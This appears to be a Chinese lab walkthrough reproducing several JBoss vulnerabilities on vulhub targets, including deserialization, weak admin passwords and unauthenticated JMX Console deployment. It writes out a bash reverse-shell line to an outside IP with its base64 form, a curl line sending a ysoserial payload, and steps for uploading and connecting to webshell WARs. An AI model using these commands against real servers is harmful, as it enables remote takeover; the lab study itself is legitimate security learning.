当前位置: 首页 > article >正文

JBOSS中间件漏洞复现

CVE-2015-7501

1.开启环境

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

2.访问靶场

3.访问/invoker/JMXInvokerServlet目录

4.将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.121.191.208/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=

使用ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

curl 47.121.191.208:8080/invoker/JMXInvokerServlet --data-binary @exp.ser 

5.监听6666端口

反弹成功

CVE-2017-7504

1.开启环境

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问漏洞地址

/jbossmq-httpil/HTTPServerILServlet

4.使用python3 jexboss.py -u http://47.121.191.208:8080进行getshell

CVE-2017-12149 

1.开启环境

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

2.访问靶场

3.验证漏洞是否存在

访问此/invoker/readonly目录

返回500,说明存在漏洞

4.使用工具检测,执行命令

 Administration Console弱⼝令

1.开启环境

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

依旧是此环境

2.首先访问密码文件

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

3.访问/admin-console/login.seam目录

使用上面的用户名密码进行登录

4.点击web应⽤,上传后⻔ shell.war

5.访问此文件

/shell/shell.jsp

6.测试连接

高版本JMX Console未授权 

1.依旧是12149的环境

2.访问/jmx-console/目录

用户名:admin

密码:vulhub

3.在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

4.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

5.输⼊Invoke

http://47.121.191.208/zxin.war

6.访问zxin.jsp

/zxin/zxin.jsp

7.使用哥斯拉进行测试连接

低版本JMX Console未授权 

1.开启环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问/jmx-console目录

登录

admin admin

4.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

5.使用哥斯拉进行测试连接


http://www.kler.cn/news/323038.html

相关文章:

  • STM32 RTC实时时钟学习总结
  • WordPress精选文章如何添加侧边栏和页面?
  • 计算物理精解【8】-计算原理精解【5】
  • 如何在ChatGPT的帮助下,使用“逻辑回归”技巧完成论文写作?
  • sql server 版本补丁更新
  • Superset二次开发之Git篇git fetch 异常信息汇总
  • 【深度学习基础模型】Variational Autoencoders (VAE) 详细理解并附实现代码。
  • 【基础知识】Go中的同步机制
  • 基于yolov8的辣椒缺陷检测系统python源码+onnx模型+评估指标曲线+精美GUI界面
  • STM32G431RBT6 VREF+与VDDA引脚
  • 计算机性能指标之MIPS
  • 极狐GitLab 17.4 重点功能解读【九】
  • Windows安全日志7关键事件ID分析
  • 95分App引领绿色消费新潮流,闲置物品焕发新生机
  • 【JS】函数柯里化
  • 「数组」离散化 / Luogu B3694(C++)
  • 畅阅读微信小程序
  • RHCS认证-Linux(RHel9)-Ansible
  • 代码随想录Day 58|拓扑排序、dijkstra算法精讲,题目:软件构建、参加科学大会
  • Linux操作系统中MongoDB
  • 前端开发之代理模式
  • Cilium + ebpf 系列文章- (六)Cilium-BGP与分发-EXTERNAL-IP
  • vue3中< keep-alive >页面实现缓存及遇到的问题
  • 【深度学习】深度学习框架有哪些及其优劣势介绍
  • 【CSS】透明度 、过渡 、动画 、渐变
  • JAVAEE如何实现网页(jsp)间的数据传输?一文总结
  • 2024 icpc 第二场网络赛题解
  • vue-cli,element-plus,axios,proxy
  • 31 变量的访问方式(直接和间接),内存地址(32 位和 64 位),指针的概念与定义,取址与取值运算符( 与 *)
  • Spark Streaming 容错机制详解